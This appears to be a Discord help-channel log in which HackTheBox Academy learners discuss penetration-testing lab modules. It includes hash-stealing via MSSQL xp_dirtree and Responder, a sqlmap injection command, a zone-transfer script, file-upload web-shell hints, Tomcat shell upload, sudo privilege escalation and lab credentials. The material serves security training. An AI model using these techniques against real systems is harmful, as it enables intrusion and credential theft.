#modules

Probably, Linux and Windows Fundamentals plus Web Requests

simply the rsa id file was damaged, I redid it and i have completed the form

yuuuuhuuuuuu

big satisfaction

follow Pentester/Bug Bounty Hunter/SOC Analyst path based on ur interest?

Hello, im stuck in the ATTACKING COMMON APPLICATIONS module at the Attacking GitLab content, at the question Find another valid user on the target GitLab instance. I tried the bash script and the python script , i found several users , no one match with the question .. i tried all the wordlist from seclist/username, im pretty lost if someone could help me thank !

Yeah I started the linux fundementals but when it got to the point where some commands looked like this "grep -Po "https://www\website.com.*?(?='|")" I started to get confused how often would I use a command like that?

regex? yes you will use it often as a professional

But as a beginner will I use it often are there any other outside resources that will help me undestand regex a bit better?

don't think about it too hard, use available resources like regexr.com
hell use chatgpt to suit your regex needs as beginner

hello! I'm on the service enumeration module with the question "One of the services contains a flag you have to submit as the answer". I found a flag htb{<flag>} when I used "nmap -A <ip> --packet-trace" but it rejected the flag. Is that the right format of the flag?

Okay thank you for the information I really appreciate it

Im exactly stuck here too

no wordlist match

try cirt-default-usernames.txt

thk i'm trying...

does not work

found root and 1 other invalid username..

Could the module be broken ?

https://arth0s.medium.com/ligolo-ng-pivoting-reverse-shells-and-file-transfers-6bfb54593fa5 nice blog post!

Ok its working

i dm you @brave panther

i did it in 2 minutes just now

the problem was caps

ok great 🙂

lost 1h on it, feel really dumb

thanks, get on the ligolo train if you haven't yet, it's the best!

You just have that every now and then. But just never give up!

yeah, much better than the tools that academy shows

just tried today, such a good tool

it's important to know all the options, but I haven't used anything but ligolo since lol

you're famous

SEO is magic 😎

?

Does anyone know how to find the flag in the service enumeration module for nmap? I accidentally found the flags ahead but not this one

You won but at what cost ?

I still can't figure it out

what nmap command did you try for service enumeration

nmap -A <ip> --packet-trace and -sV for each port. I went into tdump to see each each packet and response when probing with nc too

check dm

I got really annoyed having to check for file transfers one by one on the Active Subdomain Enumeration module so i make this quick little script to do it for me if anyone is interested in it or improving upon it.

#!/bin/bash

# Check if the correct number of arguments was provided
if [ "$#" -ne 2 ]; then
    echo "Usage: $0 <nameserver> <domains_list_file>"
    exit 1
fi

# Assign the first argument to NAMESERVER and the second to DOMAINS_LIST
NAMESERVER=$1
DOMAINS_LIST=$2

# Check if the domains list file exists
if [ ! -f "$DOMAINS_LIST" ]; then
    echo "Error: File '$DOMAINS_LIST' not found."
    exit 1
fi

# Loop through each domain in the list and attempt a zone transfer.
while read -r domain; do
    echo "Attempting zone transfer for $domain on nameserver $NAMESERVER:"
    dig axfr @$NAMESERVER $domain
    echo
done < "$DOMAINS_LIST"

Delete if it is considered a sploiler

Would also like to know if there was already a tool I could have used lol

When logged in as local admin, how do you extract the password, or the hash (rc4 | aes128 | aes256 | des) from a user using only Rubeus? The goal is to use the results in an asktgt command.

byw the ||bash ||cmnd is not blackilisted

You can also use -f flag with dig, it basically passes the file with subdomains

It looks like Brute-Force is the only way.

Thanks, I knew there had to be a more simple way

anyone can help me to understand the differnce

it work normally

in terminal? can you share the output?

u see

XD

yeah but where is the $ here in the second command

I'm sorry are you saying that my command works normally or your command?

is someone available to talk in DM about note taking & reporting please ? I am a bit lost with the suggested way to do note taking. While I think I should use the provided "template" for note taking, I don't understand where I may store my currently "live stuff" (I mean what I am doing atm). I am used to just screenshot / copy paste my term log almost all the time I do a step forward and I don't understand in which part of the obsidian folder tree I should store this

what is your question here?

normally it need to work

but loike u see its not working

read the error carefully

is it oki to dm you

i was using the same cmnd just remocing the ||bash<<<|| thats all and like i said normally it excuted on my terminal

sure

Hello everyone,
I'm doing the password attack module and when i try to do the wirm first command i got an openssl segmentation fault and i'm unable to connect to the target...
Anyone knows how to fix this ?

Post a screenshot.

Not sure if you are running into the same thing, but I had to make changes to /etc/ssl/openssl.cnf

[provider_sect]
default = default_sect
legacy = legacy_sect

[default_sect]
activate = 1

[legacy_sect]
activate = 1

my bad not a segmentation fault..
but still openssl

that user might not have psremote rights

oh..

so i'm supposed to find another one ?

which section is it?

network services

should be able to winrm with that user

try sudo apt install openssl

yeah that's what i thought,
so the problem is from my parrot i guess
i tried reset the targer and i got the same error
i'm gonna try again tomorrow

nothing

that's strange, try reinstalling both?

hey i'm stuck on the Service Enumeration nmap module. The challenge is "Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer.

I tried the following:
nmap -sV -p- -vv <ip>
nmap -A <ip>

• proceeded to review ALL THE TCPDUMP OF THIS (Found the flag of the next module)
• I tried nmap enumeration scripts for each protocol
• netcat -nc to probe the ports manually and see the response using tcpdump

You'll need some patience, as the correct port takes a minute to give you the answer

i remember this one lol

Password attacks is worse for patience

I lost my patience with that so I came back to this challenge I couldn't solve

It's really as simple as just waiting

You'll get 220 HTB{FLAG}

220 is the response code (which you'll leave out)

I see I see

Idk what it looks like in tcpdump

Didn't do that portion

Also if you are, don't forget to specify the tun0 interface

yep yep I did it on tun0 :D

Should be able to nc -nv ip port

Iirc

was about to get water and it popped up on my screen

ty a lot marcie

guys iam at the basic tools module I really dont know how this works

Gonna need to be a bit more descriptive

yes I wanted to send an image but couldn't send it

see community help

That's because your main htb account isn't linked

See: #welcome

i wish i were good for those kind of situation 😦

The 8 hours listed for the Password Attacks module is really hurting my confidence. 🙂

i'm in this section: https://academy.hackthebox.com/module/136/section/1289

i found the extensions that are passing through the white list and the black list but they're not being saved properly

Protip: ignore that number

some modules took me super fast to finish while most modules took me forever and way longer than the time they stated

Try saving it as .jpg.php or something

😭

And what happens when you do ?cmd=whoami

Hey!

nothing happens

Any hints on how to start the Attacking Common Services SQL lab?

I've authenticated with the user and password provided by the lab, and I am using mssqlclient.py from impacket.

The question is asking for "What is the password for the "mssqlsvc" user?"

I got into msdb with the command:

SELECT table_name FROM msdb.INFORMATION_SCHEMA.TABLES

Don't know where to go from here.

USE <DB name> to use a DB, SELECT * FROM <DB Name>.INFORMATION_SCHEMA.TABLES to get tables in a DB, SELECT * from <table name> to get table contents

i dont know if i can ask this or not, I have following some writeups and on that writeups, it supposedly allowToDelegate, but when i am try it its always ReadGMSAPassword, i have followed the instruction exactly. do you know why? is it because i am onm different time(skew clock)? anyone can help what is my mistake?

I've tried that for multiple databases in the module.

I've figured out the commands, but the main two databases are password protected

Or so it seems

maybe then you should try another way of getting the password, try the other steps in the section

look up how to sync kerberos clock

I tried responder, it just hung on listening.

because you need to make the target connect to it

how?

I only have access to the IP given in the module

the same section as wher they mentioned responder: Capture MSSQL Service Hash

sudo impacket-smbserver share ./ -smb2support

is unresponsive

this didn't work

I got this:

check the section I mentioned again, there are 2 procedures that you can use to force a connection to your responder

Steal the hash

Yeah, that didnt work.

Then you didn't try hard enough

there are 2 procedures

^

Responder didn't work either

It just gave a long output with no hash

Are you sure the long output didn't contain a hash?

I'm sure

Take a long look at the output in responder. If it starts with mssqlsvc

That's the hash

I don't see that

I think my starting point is wrong. Where do I start. I'm authenticated, then what?

Fuck around

Literally try and look at all the methods you can do

Did you run responder on the right interface? Make sure to double check.

I dont recall that question being difficult, I remember needing to do a bunch of nonsense at one point

But can't recall what lab

capturing the hash is right

I ran it on tun0

Show output responder gave

then what's the long output? responder showing the server status?

So when you ran the xp_subdirs it gave nothing?

Bc that's just the launch for responder telling you it's running

Which you then launch the xp_subdir command against

That one just hangs

Can you show the xp_subdir command that you're entering

it's not hanging, it's listening for a connection, like I said, it can't capture hashes unless you force the target to connect to your listener

So I start the impacket-smbserver first?

yes, and either smbserver or responder will work

So what is "share" and "./" ???

I thought SMB was the last module

I'm confused

rtfm

I thought this was an SQL share, not an SMB share

I guess I should clarify, SQL database, not SMB share

Now I am very confused

...

You would need to work back on the basics, do some research on SMB Shares.
Having either listeners (responder/smbserver) running on the background and making the database authenticate to your listeners ip should completely work.

Xp_subdirs allows you to read smb shares

That's LITERALLY what you're meant to do

(the precedue is the other one in the section, idk if they've tried it...)

It's literally in the section @next bronze talked about

They show it weirdly out of order but explain it in order

So am I trying to use SMB or SQL?

I swear to fuck

Both?

Responder creates a false smb server

That you call to from the sql query

Just looking at the examples is generally not gonna be enough

Because you need to read the context

It's actually explained

so I am in the SQL server with mssqlclient.py

Adm

now I have to use SMB?

Brother

READ

Just fucking READ THE CONTENT

Too much🥄lol

@next bronze was nice enough to screen grab the part that explains it

But holy fuck dude

Take your time and read everything, everything you need is in the module.

Like I get it if this was about the impersonation thing because that was a pain in the ass

But this is the easiest method of attack

What impersonation thing?

Don't worry

I got the creds from the lesson prompt

Not important

It comes up in the skill assessment

Not in the section question

Oh great, I can't wait

Since you're failing so spectacularly on this

It's gonna be a struggle bus

I'm not failing, I'm learning

You're failing to read

and you're helping, thank you

you're using the stored procedure to make the SQL server access a file on, using \\<ip>\ means the target will try to access using SMB, that's how you can capture the hash

Because it's literally explained in the section

Which @next bronze just copy/pasted

also @ whoever deleted the sreengrab, am I not supposed to post screenshots of the modules?

Probably a mod bc spoiler of paid content

whoops my bad

¯_(ツ)_/¯

He wasn't getting the point anyway

Like trying to drive a nail with a screw driver

It'll probably eventually work

It's just so hard to piece all of this together, it would be nice if there was a walkthrough.

Sir

Respectfully

Fucking read the part about stealing hashes

Actually fucking read it

Because this is not some sort of rocket science

Fuckin reason we have instructions on shampoo bottles

the module itself is the walk though, you're supposed to use what you have learned to complete the exercise

This 100% isn't one of those times you need to do outside research to figure it out

like if it was something that needed that extra bit of Uncle Google or Auntie GPT to understand then I get it, but no - it's right there

Is there a way to do this in mysql even though it's MSSQL?

i swear some of these questions are basic comprehension 🤣

no, and I suggest you revisit the foundation modules like windows and linux fundamentals, if you're confused about this, you might not have a solid grasp of the operating systems, services and protocols

is sql covered in that?

read it again but slowly

no but like, MSsql and sql, different eco system

literally all you gotta do is what it shows you to do

run Responder, use xp_dirtree or xp_subdirs

and THAT'S IT

yeah i got that, was just curious if sql was covered in those sections

i didnt do them

https://www.exploit-db.com/exploits/46635 how to do this with sqlmap

i know i can just use this script but i wanted to try with sqlmap, but how much ever i try, sqlmap doesnt detect this sqli

what module is this regarding?

its from a machine but ig it relates with sqlmap module?

|| sqlmap -u "http://10.10.10.138/writeup/moduleinterface.php?mact=News,m1_,default,0&m1_idlist=a,b,1,5" --technique=T -p m1_idlist --dbms=mysql --prefix '))' --suffix '+--+' -v 3 --batch --tamper ./space2plus --no-escape --delay 2 --skip-urlencode --time-sec 10 --level 5 --risk 3|| is what i tried but it says false positive or unexploitable even though it is exploitable

i think sqlmap doesnt have capability to use select sleep() from query

This is the modules channel

ask in #boxes

ain't no way u jus said that bruh

gave me a good laugh, hope you figured it out though

hey guys, in "Attacking Common Applications - Skills Assessment I" last Q :
"...contents of the flag.txt file on the Administrator desktop"

the type command nor the any other command works to get the content of the flag.txt
I can see the flag and its location but I can't see its content ...

any hints please ??

if it's a windows host; have you tried type filename?

yes, the tpye gives an empty page
and the dir show that directory again

i mean dir doesn't read files

what?

the dir command shows the directory and the type shows an empty page.
that Y I wrote that I can see the directory of the flag but I can't see it's content ....

that's odd and you're on the right Administrator host yeah?

if you're rdp in, can you click it on the desktop?

it's not rdp

it's the right administrator (since there is only 1 )

ok I think I got it, I just need to find hardcode paths ...

?

Like C:\Administrator\Desktop

yes
of type I think...

type can do relative path

If you're in the directory

not sure I got it
which directory??

what's the current directory when you tried to read the flag? not the flag directory, the direcotry you're at

U mean write my current directory with the type command and then the path to the designated file right?

type c:\users\administrator\desktop

yeah that doesn't wroked 4 me ...

that's cause you can't type a directory...

lol

ofc, ts the directory path that its in the command, I'm just pointing out the correct path

Having trouble with the "Enumerate the flagDB database and submit the flag as your answer" I have the || password of mssqlsvc, but I can't log in using neither mssqlclient from impacket nor sqsh||

basically, if the file it's not in your current directory, use absolute path for situation like this

Am I supposed to use || IMPERSONATE|| or something?

And I'd try something different. Such as maybe a CVE for the web server.

No one can help if you don't provide the Module+Chapter

Module and section

Attacking common services module, the Attacking SQL section

Question 2 I assume? If so, no. Just sqsh and look through the tables.

sorry I don't understand

I think I did mentioned the full path to the flag directory ...

Unfortunately sqsh tells me I don't have the right password

Password should be the answer from Q1

That's why I don't understand why it doesn't work

I guess I'll try restarting the machine

You should have stolen the hash and cracked it with hashcat

Yep

what's your sqsh command?

oh, maybe you are passing the wrong username

Username should be ||.\\mssqlsvc||

|| sqsh -S IP -U mssqlsvc -P 'princess1' ||

Ohhhh

it's absolute vs relative path, works the same in windows linux, look it up if you're haijv problem understanding

the newer sqsh doesn't use that anymore

I did the module over a year ago. 😄

That worked though

hm maybe you didn't update then

as long as it works

MSSQL login use that .\\ as a prefix so that it knows its referring to a local account, rather than an AD account. 🙂

No query is working atm, but at least I logged in

the thing is that I solved this already but I don't remember having this issues with it before ...

ah right

I got a shell on the box by exploiting a CVE, and did it that way

someone ??

huh? didn't we have already explained, if the file is not in your current directory, use absolute path

can I DM?

I did use absolute path ...

Does any one else have trouble with the website clearly not allowing correct answers?

every time i enter the answer into the box, it just says sorry incorrect. though it is clearly a correct response. ive tried multiple ways of capitalization, and yet it wont accept it. but there is literally no other answer it can be. there are two issues, any one know how to resolve these problems?

No

There's a few instances where the syntax is finickity, but as a whole, the answers are right or wrong

Most common problems are where you paste an answer, and forget to remove some whitespace from the beginning or end

pretty hard for something as simple as a hostname to be incorrect. ive been using linux for 20 years and decided to take some of the modules, but its not off to a good start. no variation typed or not typed will it let my answer correct

Which module/section/question?

/module/18/section/70

None of those questions ask for the hostname

spawned the machine. used uname,and all its individual flags still no avail. sorry meant hardware name

Try ||uname -m||

seems to not want to go through its only x86_64 but just denies me lol

The hint literally tells you to use uname with an option and the question defines what the exact matching switch is needed. If that isn't working, then you've got a whitespace/keyboard issue, or you need to contact HTB support.

Hi Team, during skills assessment(shells&payloads) , connection from pwnbox to a foothold box keep dropping. And, connecting through vpn is extremely slow. Please suggest any recommendation.

Try pwnbox?

alright ill contact them, ive used the uname commands and supplied it with pretty much everything it had in parts full, and all lol, seems to be an issue, its not the fisrt one ive had, could spans machines yesterday, now i can, no idea what that was about

figured out the issue :/ just read on a post, its a javascript thing, i enabled it through uBlock, some how or another it was disabled from loading. probably me accidently clicking that particular filter when i updated it last. but it had accepted the answer i just got a funky result. as when it reloaded, it updated as correct and i could not click it again, so theres that if any one else has that issue thats the problem in my case

hey quick question: why would i turn off the dns resolution in a nmap scan? will the scan be quicker/stealthier? and is it on by default?

When connecting to telnet service via smtp port 25 ...

when entering credentials, is this the format:

telnet ip_address 25

USER username

PASS password?

hello i have a question regarding academy annual subscription, where should i ask it?

SMTP uses different authentication.

Thanks, I figured it out

does **"Direct access to all modules up to (including) Tier II" **mean that I don't need to pay cubes for modules that are tier 2 or less? @me

From pwnbox it keeps dropping.

Yes, they are included in the subscription

thx

If its dropping on pwnbox as well as on the VPN, I'd restart everything

@pine dagger sent you a DM, hope its ok.

Okay Thanks.

Hi I am doing the Linux fundamentals and for some reason I am getting this pop up

I think thats pkexec. starting service requires higher privilege
try sudo systemctl start ssh

Nice it works thank you

Btw anyone here working as pentester/bug bounty hunter without studies/university? Is it even possible?

did you figure it out?

I am but only freelance stuff

not really I tried to move on
to the second assessment (got a bit trouble there as well)

the "enjoyable" part is that I did it already, I'm trying to make my some notes

in "Attacking Common Applications - Skills Assessment II"
when I try to use "gitlab_13_10_2_rce.py" I get:

[1] Authenticating
Successfully Authenticated
[2] Creating Payload
[3] Creating Snippet and Uploading
[-] Exploit failed

dm if you need, though I've already explained all I can

what makes you think that it's vulnerable to the RCE?

Guys, I'm having some difficulty on "Stuxbot - INTRODUCTION TO THREAT HUNTING & HUNTING", in finding what is the name of the "famous powershell hacking tool!" D: Can some one give an hint or some assistance?

"Some PowerShell code has been loaded into memory that scans/targets network shares. Leverage the available PowerShell logs to identify from which popular hacking tool this code derives. Answer format (one word): P____V___ "

found a lot of code in the field "powershell.file.script_block_text", and pasted some parts in a search engine, but could not find any correct powershell tool, only a whole lot of spare scripts...

Hi guys how can i read flag 4 from linux hardening Linux priv esc module please?

try to understand a little on what the tool does, then search according to its functions

there's no flags in that section

yes there are 5 flags

what's the name of the section

Linux Local priv esc

The last section

skills assessment?

Yes

that's not hardning

Yes sorry

what have you tried?

I found apache tomacat user and password

But i don't know how to read the flag

Hello everyone, Im on the IPMI module in Footprinting and I am having trouble cracking the hash

I'm so lost hahaha After so many days ... xD Reviewing the module did not seem to help!

guess I will bang the head some more...

probably the lack of PS knowledge.

google how to access tomcat manager

I did it

Iìm inside

I cannot read the flag lol

anyone that could help me with that. So Its -m 7300 and the I have the hash from ipmi_dumphashes.
Now Ive tried basically eevery different format and hashcat just owont take it

it's used in active directory post exploitation reconnaissance

https://hashcat.net/wiki/doku.php?id=example_hashes

UR right that was a stupid assumption I made

its fine I got it

thanks

Can't thank you enough ❤️

I did it

I uploaded a malicious shell via tomcat

good job

Obfuscate the flag. If you got it from blind-sql injection, then you'd need to run it again.

run it again, missing some characters if its time based

also avoid spoilers 🙂

Why can't I get the flag on kali machine?

it will go blank

I get it from my pwnbox

i dont know

i got it from my parrot

What is your sqlmap version?

it should work, I did everything from kali

latest

dev branch

Can somebody help me with Attacking Thick Client Application. Upon modyfying the bat fiile in the tmp, and running the bat file only oracle.txt is being created in ProgramData

you mean reset the target and run it again?

no.

Hi

Any one done cpts

with the whole modules or the exam?

Modules

Exam I know There is 210$

Plenty

Like about 4-5x more than have the cert have finished the path

#cpts message

Make sure no weird spaces

If you copy/paste

Should probably delete since spoiler

Hey guys I need help with the attacking common services skills assessments, can I dm anyone?

@hallow kiln can i dm? AD module skill ass 1

im a little stuck on the web attacks skill assesment i managed to find the uid of the admin user so im trying to login as the admin via and idor but not sure how i intercept the request and change the uid but nothing changes any help if you need more detail i can provide it just trying to avoid spoilers

I'm a bit stuck in the Windows Event Logging Basics section of Windows Event Logs. The second question asks to craft an XML query to determine if the previously mentioned executable modified the auditing settings of C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WPF\wpfgfx_v0400.dll. Enter the time of the identified event in the format HH:MM:SS as your answer. Is anyone available to assist with crafting this query? It's odd that such a question would be in this course so soon without any XML language modules prior to this.

sure, go ahead

nvm got it

No one is giving any help

Just ask your question here, then there is a good chance that you will get help

yeh go and ask your question i will try help you

and which attacking common services are you talking about the first or the secound one ?

Hi, do you have this error on this module : Footprinting / Oracle TNS?

┌──(kali㉿kali)-[~/odat]
└─$ sudo apt install oracle-instantclient-basic oracle-instantclient-devel oracle-instantclient-sqlplus -y
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
E: Unable to locate package oracle-instantclient-basic
E: Unable to locate package oracle-instantclient-devel
E: Unable to locate package oracle-instantclient-sqlplus

That looks like an apt issue itself. Have you tried sudo apt update?

Yes it works for this error:

404 Not Found [IP: XXXXXX 80]
Err:2 http://http.kali.org/kali kali-rolling/main arm64 debhelper all 13.11.6
404 Not Found [IP: XXXXXX 80]
Err:3 http://http.kali.org/kali kali-rolling/main arm64 python3-pip all 23.2.1+dfsg-1
404 Not Found [IP: XXXXXX 80]
Err:4 http://http.kali.org/kali kali-rolling/main arm64 python3-pip-whl all 23.2.1+dfsg-1

"Oracle TNS" gives me a lot of trouble

Never mind. I figured it out ChatGPT is your friend!

hello guuys im struggling wit the last privesc in getting started ---> knowledge check

i ran linpeas and found out some suid files i tried to look how to exploit thise files with gtfo but nothing works

Anyone do the Intro to Whitebox Pentesting: Code Review - Services? Asks for full route for the endpoint linked to generateQR function -- maybe I'm completely misunderstanding the question, but not only trying what I thought the answer was (along with everything else I could come up with) has failed me. Please DM. Thx.

Not necessary

If it's not something simple: it's wrong @crystal steeple

linpeas shows a lot of things

Doesn't mean they're all right

hmmm

i will try again

Did you try just doing sudo -l

yes

i found tht php file

That's all you need

but i couldnt overwrite it

You don't need to overwrite it

wait

It's an application

my brain stopped working

when i ran that , i got a blank page which i can write anything there

Check gtfobins

For php

ye man im done

i did all that i tried idk if im doing things right

i checked for everything you said before i asked but nothing works 10000% im not using right commands in right places

and then i get that blank page

i followed commands in gtfo

and paste them there but nothing happened

The command in gtfobins is pretty straightforward

you can sudo with php right? follow the commands in the sudo section

yeeep as i said i was pasting commands in a blank page

now its worked and got root lol

thanks guys !!

I dont understand from where to stand i'm familiar with CTFs but i see in the HTB there are so many paths, Where should i start?

Just From Machines?

I've done much of labs and CTFs not in HTB, On other platforms, But here i can see there are so many, Machines, Challenges, Sherlocks, Acandemy, What to chose lol?

Just start with active machine?

do whatever that interests you, if you already have experience with ctf, the active boxes are indeed a good place to start

What about the Starting point?

I dont really get this

I'm in tier 2 in the "Starting Point" What comes after?

I can see on the left tab
Starting Point
Open Beta Season III
Machines
Challenges
Sherlocks
Tracks
Academy

So Seems like the most relevant here is the Machines section am i right? Just start from easy mode? What are the differences between ACTIVE MACHINES and RETIRED MACHINES? seems like the RETIRED MACHINES has much more LABS,

retired machines have writeups and dont award points

active machines dont have writeups but do award points

What does points give me?

just "fame"?

points like a video game hiscore

pride and accomplishment

Ok, So how can I know that a retired machine is relevant (or irrelevant) because it's "retired"

I know everything is relevant... even log4j lol

So you suggest to skip the Starting Point and go right away to the Machines?

what do you mean by relevant?

Not updated, too old

if you find starting point easy then skip it

you can order by release date

Starting point is untill Tier 2 am i right? (right now i'm on tier 2)

but they are CTFs so they will have you doing things you (hopefully) shouldnt see all too often in the wild

shouldn't see all too often in the wild? what do you mean?

like CTFs have customized scenarios that are meant to make you think more than on a regular assessment

This isn't related to academy

hack the box has many realistic boxes but also some are more just fun and interesting challenges

There is a #starting-point chat

You need to verify/link your account following #welcome

So how can i determine what is more realistic and what is less?

Why

We can speak here for now

This isn't the place for this conversation, this channel is for discussion about academy content

them's the rules

Not main platform

So lets finish our lil chat and after that i will verify myself

k?

Realistic means you won't be guided to the next step

End of sentence

Yw

Oh yea seems like I have done shit like that before

somthing really easy took me entire day

of searching and wambling

You get told "hey this is the goal, good luck" in main platform it's 2 flags, user and root

without any guidance

For academy it's the skill assessment at the end of a module

Machines often have a combination of faults related to the academy modules in Academy X HTB page

But it's not like you'll have all the info just from doing the modules

Oh so there is a related machine CTFs after each academy module

Just gives you a stronger base

Not really ctfs just retired machines

I've already completed eJPTv2 so i think that i dont really need academy

Unless you mean the skill assessment?

You'd be surprised

wrong

Yo ! I wanted to ask if um thinking corectly.
Footprinting Lab Easy, question: Enumerate the server carefully and find the flag.txt file. Submit the contents of this file as the answer.
Ports 21 and 2121 are open, they provided credentials for user name ceil.
Im trying to dwnl files using wget command, however it seems that its always failing due to connection time out.
Its just broken or using wget is not a solution ?

machines take a lot more than 1 module from the academy. but you can check if content from the module is related to a machine

eJPT is super basic compared to what's on Academy

ejpt is nothing compared to the content in the academy

Wget uses port 80

Web-get

You need to access the ftp server you have a username, now get a password

So If i pay for "VIP" it's include the academy in?

Vip is separate

Academy is a seperate platform

Oh

^

But are you l337 enough to take on the ultimate hacking test... CEH? /s

Well they are providing both username and password. But now im not sure if they are valid for SSH or both

but you can have a few weeks of content in academy before reaching the point where you actually need to spend money. if you concentrate on Tier 0 modules

...

You have a valid port for ftp

Poke around on ftp

Specifically the alt port

kk, thx

Start with known info always

actually i'm 4 years developer and Computer Science+CYBER SECURITY graduate, But i've heard about CEH It's really advanced

It's a meme

Oh

why?

But CEH != eJPTv2?

I've been told it's almost the same lol

ceh is just multple choice questions

Or compared to somthing else

how can you learn pentesting from that

so what you can compare eJPTv2 to ?

PJPT is a lot more practical

eJPT is just something to get your feet wet and see if you're interested

I dont really care about the certification, I care about the knowledge

if you care about knowledge, CPTS is what you want

there is plenty in the academy. just look through it.

If you only care about knowledege don't do any certs lol

Yea I learnt from INE academy shitty course haha

But you need some motivation after all dont you?

if you want a benchmark, do an easy/medium box and see how far you can get

I added the /s tag as I was being sarcastic. You passed your eJPT -- that's fantastic -- celebrate the win. But if you truly are that unaware (as your response to me suggests)... I truly feel bad, as you are blissfully unaware of how little you truly know. That said, keep on keeping on, as at the end of the day, we are truly know little -- it's just having the self-awareness to know that we know nothing vs. the igorance to think we are that good.

My motivation is learning, if you need external pressure that's on you to pay for it.

Seems like it will be hard enough for me, I think that medium is the maximum for now

try it out, active boxes are free and don't come with write-ups

with respect, I have ejpt, and I'll be very surprised an ejpt holder can do an easy box without problems

So just go for the Machines Section?

Ok i trust you

and depends on the box, Linux box it's easier for me (becuase of my experience as developer)

Lol nice

You're giving me good advices (for real)

Finally got the hash on the attacking common services SQL module, but -m 1000 mode on hashcat is saying no hash loaded.

What type of hash is this?

Net-NTLMv2

Seems like there are retired machines easy level for free

read the section please, it tells you there

entirely different thing from NTLM

but yeah, the section explains it including which hashcat mode it is

all active machines are free (but you are on a shared vm with others, so there might be left over exploits from othr users). Just try some of the active machines and see how you feel before jumping into VIP and retired machines

But in Pentesting there are many fields, Even for a CTFs, There are WEB pentest and network pentest and server pentest and many more, I should chose my field am i?

Didn't you say you were a cybersecurity graduate?

you should be decent at all fields then specialise into one if need be

It says NTLMv2

Yes, Low level reverse engineering field BOF and shit

That's mode 1000 right?

code research

No, 1000 is NTLM

What's your favourite disassembler?

if you want something more specific look at the challenges, they have some for reversing or the web section has you read the code of a webapp and find a vulnerability you wouldn't otherwise find so easily

again the active challenges are free, the retired ones require vip

We've used gdb

The Art of Software Security Assessment: Identifying and Avoiding Software Vulnerabilities. By Mark Dowd, John McDonald, Justin Schuh. Addison-Wesley, 2006

and cryptographic

Hi is it possible to get some help on this please, is this broken?

pretty sure that's not a disassembler

but yeah, good luck on your journey

Okay, found it NTLMv2's mode I think. -5600? Do I use the whole thing or take out the username and domain?

whole thing as you see it

im doing linux buffer overflow right now and it uses gdb for disassembly

Okay, maybe 5600 wasnt correct? Hashcat shows status "exhausted"

huh how is gdb not a disassembler lol

🤷‍♂️

which list are you using?

i did not use any "known dissasembler" (just like ghidra) I've just exploit vulnerabilities in code just like BOF and jumping to critical sections in a code, Override vptr in C++ code and etc...

The one in the resources for the module

thats right

pws.list

try rockyou

So there are reverse engineering or BOF challenges in HTB too?

I didn't use rockyou, but it's probably in there

gdb can show disassembled output but it is not a disassembler afaik

challenges > reversing

Yeah, that worked, it wasn't in pws.list

The Ghidra is the real dissasmbler for reverse engineering afaik

Thank you!

I wonder why the pws.list doesn't have it?!

I've got two lists from that module, one was found somewhere else

@rustic sage So HTB has this kind of challenges too?

@wet kite this question directed to you too

Dunno, did all my work for RE on offsec, I'm sure others can help you better wrt HTB content.

So I got the password and it worked as the answer, but it's not working to log in

lol didn't I replied challenges -> reversing

are you using windows authentication?

yeah, academy has some modules on it. BOF and assembler code. Also the challenge section in HTB should have something like that, didn't look into that one much so far.

No, I'm using sqsh like I did for the supplied credentials

Am I supposed to RDP or something?

What do you mean by challenges -> reversing? Sorry for missunderstanding lol

You might have to supply a flag like -windows-auth or something

htb platform, challenges section, there are specific reversing challenges

and the pwn challenges also has bof

Wtf so now I have Machines section, And Challenges section, What should i use

Oh wow

like I said, do whatever interests you

I never use that, tbh, mssqlclient.py is my preferred choice and it's better imo

it also depends on which area you want to learn, do you want to continue on what you already know? or leaning new things

Oh so in Challenges section you can determine by type of what kind of challenge you would like to complete, Those challenges are the same as we have inside the Machines section but it's just arranged and sorted by subjects?

challenges only has one flag, and it's usually shorter than a machine, you get a docker container to hack instead of a full os

"Challenges" Section has the machines inside the "Machines" Section just sorted and arranged into subjects?

Oh so it's different from Machines, Ok...

Can i arrange the Machines by subjects too?

Login failed there too

In the Advanced XSS and CSRF Exploitation skills assessment, should I be able to log in? It logged in fine for me a week ago but now its not...

only for retired machines, use advanced search to choose the area of interest

did you use the -windows-auth flag? cause otherwise it default to kerberos

I do vaguely remember that I had to use sqsh, not too sure tho

Dam that helped alot

I have it in my notes, I used mssqlclient, but I'm sure sqsh can be used as well

ah ok then I guess it's skill issue

So i can see there are many "low level" challenges there

Okay, that worked. Did I miss something in a previous module?

i meant BOF and code vulnerability exploit

i dont know how it's called

think it's time to move the chat to somewhere else, this channel is used for academy module topics

it's in the footprinting module, if not directly in the attacking common services

Thanks man

if you get verified and wants to continue the topic, drop me a ping

Cool, found it, thanks!

Do you remember where? I have been looking for it. Trying to figure out how I missed it.

the section on MSSQL

near the end

OK. Haven't got that far yet:

--local-auth is not just limited to mssqlcient.py btw, it's available in most impacket tools that uses windows auth

footprinting, not the SQL injection modules

Also CME/NXC.

oh wait, sorry mate, you were referring to an entirely different thing

lol. All good.

based on a quick search in my notes, it appears the first time we see it is in the Password Attacks module

Frustrating. It looks like I didn't miss it then it is just not mentioned.

you haven't done that one?

sometimes you just gotta read the manual

I am on hard right now and needed it.

thanks.

which module, sorry?

password attacks. The hard exercise.

then yeah, it is mentioned in that very module

Do you know where?

I have searched and come up empty.

yes, one moment

windows lateral movement under the pass-the-hash section

Thank you!

you're welcome

I got the flag, fun fact sth was wrong with my target or sth. I used the pnwbox and it worked. Btw u can use wget command and specify port other than 80 bro

Why did the flag show up like this?

b'HTB{SPOILERS}'

that's what the whole thing looked like with "SPOILERS" to replace the actual flag

what is the b' ' ?

This is for the SQL flag in attacking common services

Hi, I have a bloodhound question : Documentation & Reporting Practice Lab, I observe a weird behaviour:
After running bloodhound-python (as Domain Admin), I cannot find the relationship that link Remote Desktop Users group on DEV01
This information seems to be potentially visible through bloodhound since it is written as a Finding in the obsidian folder.

I have run multiple times bloodhound and don't get this info.
Any idea please ? would this be a limitation of bloodhound-python ?

the b' is a string representation in python (sqlmap is coded in python)

It is bytes, not string.

did you try with sharphound

No, was thinking about trying this tomorrow in bed now :D) thanks for the suggestion

I've ran into instances where bloodhound didn't get all the edges

Anyone have any hints for the Tapping in to ETW section in WINDOWS EVENT LOGS & FINDING EVIL?

opa

I need someone to hack someone for me, she stole my account, and I don't really understand that

What have you tried and what is not working?

Contact the local police station

bru, ok, tanks Bro

It was a game account, I don't know if you can help me

it was on roblox

Read #rules

Contact Roblox Support and the local police

Nobody can do anything for you here

what you're asking for is illegal, no one's going to help with that

